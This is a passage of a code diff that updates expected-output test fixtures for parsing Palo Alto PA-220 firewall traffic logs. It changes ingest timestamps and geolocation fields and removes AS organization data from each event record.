@@ -5310,7 +5150,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031602600Z", + "ingested": "2021-12-14T14:51:01.287207881Z", "original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24172,1,52514,443,41958,443,0x40001c,tcp,allow,7231,2228,5003,22,2018/11/30 16:09:22,0,web-advertisements,0,32091143,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:39.000-05:00", "timezone": "America/New_York", @@ -5338,26 +5178,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 171, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -5479,7 +5314,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031608400Z", + "ingested": "2021-12-14T14:51:01.287208202Z", "original": "Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:40.000-05:00", "timezone": "America/New_York", @@ -5507,26 +5342,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 4282, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5648,7 +5478,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031613700Z", + "ingested": "2021-12-14T14:51:01.287208534Z", "original": "Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24393,1,52445,4282,25566,4282,0x400019,tcp,allow,78,78,0,1,2018/11/30 16:09:33,0,any,0,32091145,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:40.000-05:00", "timezone": "America/New_York", 
@@ -5676,26 +5506,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 17472, "bytes": 2316, - "ip": "175.16.199.1", - "packets": 9 + "packets": 9, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5817,7 +5642,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031619300Z", + "ingested": "2021-12-14T14:51:01.287208972Z", "original": "Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,tanium,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24976,1,52516,17472,63757,17472,0x40005e,tcp,allow,3402,1086,2316,20,2018/11/30 16:09:25,0,any,0,32091146,0x0,192.168.0.0-192.168.255.255,United States,0,11,9,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:42.000-05:00", "timezone": "America/New_York", @@ -5845,26 +5670,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 13966, - "ip": "175.16.199.1", - "packets": 19 + "packets": 19, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -5986,7 +5806,7 @@ }, "event": { "duration": 4000000000, - "ingested": "2021-12-09T13:44:05.031624700Z", + "ingested": "2021-12-14T14:51:01.287209366Z", "original": "Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24348,1,52511,443,3803,443,0x400053,tcp,allow,16594,2628,13966,38,2018/11/30 16:09:21,4,computer-and-internet-info,0,32091147,0x0,192.168.0.0-192.168.255.255,United States,0,19,19,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:42.000-05:00", "timezone": "America/New_York", @@ -6014,26 +5834,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 244, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -6155,7 +5970,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-12-09T13:44:05.031630Z",
+ "ingested": "2021-12-14T14:51:01.287209719Z",
 "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:45.000-05:00",
 "timezone": "America/New_York",
@@ -6183,26 +5998,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 53,
 "bytes": 205,
- "ip": "175.16.199.1",
- "packets": 1
+ "packets": 1,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -6324,7 +6134,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-12-09T13:44:05.031635500Z",
+ "ingested": "2021-12-14T14:51:01.287210055Z",
 "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:45.000-05:00",
 "timezone": "America/New_York",
@@ -6352,26 +6162,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 443,
 "bytes": 2302,
- "ip": "175.16.199.1",
- "packets": 20
+ "packets": 20,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -6493,7 +6298,7 @@
 },
 "event": {
 "duration": 8000000000,
- "ingested": "2021-12-09T13:44:05.031640800Z",
+ "ingested": "2021-12-14T14:51:01.287210432Z",
 "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24264,1,52479,443,42924,443,0x400053,tcp,allow,6598,4296,2302,44,2018/11/30 16:09:19,8,insufficient-content,0,32091150,0x0,192.168.0.0-192.168.255.255,United States,0,24,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:45.000-05:00",
 "timezone": "America/New_York",
@@ -6521,26 +6326,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "Asia Pacific Region",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 443,
 "bytes": 6757,
- "ip": "175.16.199.1",
- "packets": 41
+ "packets": 41,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -6662,7 +6462,7 @@
 },
 "event": {
 "duration": 8000000000,
- "ingested": "2021-12-09T13:44:05.031646300Z",
+ "ingested": "2021-12-14T14:51:01.287210754Z",
 "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24248,1,52478,443,58977,443,0x400053,tcp,allow,65588,58831,6757,104,2018/11/30 16:09:19,8,insufficient-content,0,32091151,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,63,41,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:45.000-05:00",
 "timezone": "America/New_York",
@@ -6690,26 +6490,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 443,
 "bytes": 9007,
- "ip": "175.16.199.1",
- "packets": 15
+ "packets": 15,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -6831,7 +6626,7 @@
 },
 "event": {
 "duration": 6000000000,
- "ingested": "2021-12-09T13:44:05.031651600Z",
+ "ingested": "2021-12-14T14:51:01.287211151Z",
 "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24268,1,52502,443,64732,443,0x400053,tcp,allow,13076,4069,9007,32,2018/11/30 16:09:21,6,business-and-economy,0,32091152,0x0,192.168.0.0-192.168.255.255,United States,0,17,15,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:45.000-05:00",
 "timezone": "America/New_York",
@@ -6859,26 +6654,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 443,
 "bytes": 661,
- "ip": "175.16.199.1",
- "packets": 7
+ "packets": 7,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -7000,7 +6790,7 @@
 },
 "event": {
 "duration": 13000000000,
- "ingested": "2021-12-09T13:44:05.031657100Z",
+ "ingested": "2021-12-14T14:51:01.287211478Z",
 "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24175,1,52458,443,58292,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091153,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:45.000-05:00",
 "timezone": "America/New_York",
@@ -7028,26 +6818,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 443,
 "bytes": 11136,
- "ip": "175.16.199.1",
- "packets": 16
+ "packets": 16,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -7169,7 +6954,7 @@
 },
 "event": {
 "duration": 8000000000,
- "ingested": "2021-12-09T13:44:05.031662500Z",
+ "ingested": "2021-12-14T14:51:01.287211813Z",
 "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24312,1,52484,443,32209,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091154,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:45.000-05:00",
 "timezone": "America/New_York",
@@ -7197,26 +6982,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 443,
 "bytes": 11136,
- "ip": "175.16.199.1",
- "packets": 16
+ "packets": 16,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -7338,7 +7118,7 @@
 },
 "event": {
 "duration": 8000000000,
- "ingested": "2021-12-09T13:44:05.031667800Z",
+ "ingested": "2021-12-14T14:51:01.287212132Z",
 "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24164,1,52482,443,38822,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091155,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:45.000-05:00",
 "timezone": "America/New_York",
@@ -7366,26 +7146,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 53,
 "bytes": 182,
- "ip": "175.16.199.1",
- "packets": 1
+ "packets": 1,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -7507,7 +7282,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-12-09T13:44:05.031673100Z",
+ "ingested": "2021-12-14T14:51:01.287212474Z",
 "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:45.000-05:00",
 "timezone": "America/New_York",
@@ -7535,26 +7310,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 53,
 "bytes": 90,
- "ip": "175.16.199.1",
- "packets": 1
+ "packets": 1,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -7676,7 +7446,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-12-09T13:44:05.031678400Z",
+ "ingested": "2021-12-14T14:51:01.287212853Z",
 "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:45.000-05:00",
 "timezone": "America/New_York",
@@ -7704,26 +7474,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 443,
 "bytes": 6669,
- "ip": "175.16.199.1",
- "packets": 13
+ "packets": 13,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -7845,7 +7610,7 @@
 },
 "event": {
 "duration": 6000000000,
- "ingested": "2021-12-09T13:44:05.031683900Z",
+ "ingested": "2021-12-14T14:51:01.287213170Z",
 "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,untrust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24314,1,52503,443,53168,443,0x400053,tcp,allow,9400,2731,6669,30,2018/11/30 16:09:21,6,business-and-economy,0,32091158,0x0,192.168.0.0-192.168.255.255,United States,0,17,13,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:45.000-05:00",
 "timezone": "America/New_York",
@@ -7873,26 +7638,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 443,
 "bytes": 661,
- "ip": "175.16.199.1",
- "packets": 7
+ "packets": 7,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -8014,7 +7774,7 @@
 },
 "event": {
 "duration": 13000000000,
- "ingested": "2021-12-09T13:44:05.031689300Z",
+ "ingested": "2021-12-14T14:51:01.287213510Z",
 "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,xtrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24204,1,52459,443,28012,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091159,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:45.000-05:00",
 "timezone": "America/New_York",
@@ -8042,26 +7802,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "Asia Pacific Region",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 443,
 "bytes": 11136,
- "ip": "175.16.199.1",
- "packets": 16
+ "packets": 16,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -8183,7 +7938,7 @@
 },
 "event": {
 "duration": 8000000000,
- "ingested": "2021-12-09T13:44:05.031694700Z",
+ "ingested": "2021-12-14T14:51:01.287213833Z",
 "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,xuntrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24234,1,52483,443,16050,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091160,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:45.000-05:00",
 "timezone": "America/New_York",
@@ -8211,26 +7966,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 0,
 "bytes": 588,
- "ip": "175.16.199.1",
- "packets": 6
+ "packets": 6,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -8341,7 +8091,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-12-09T13:44:05.031700100Z",
+ "ingested": "2021-12-14T14:51:01.287214161Z",
 "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:46.000-05:00",
 "timezone": "America/New_York",
@@ -8369,26 +8119,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 53,
 "bytes": 144,
- "ip": "175.16.199.1",
- "packets": 1
+ "packets": 1,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -8510,7 +8255,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-12-09T13:44:05.031705300Z",
+ "ingested": "2021-12-14T14:51:01.287214659Z",
 "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:46.000-05:00",
 "timezone": "America/New_York",
@@ -8538,26 +8283,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
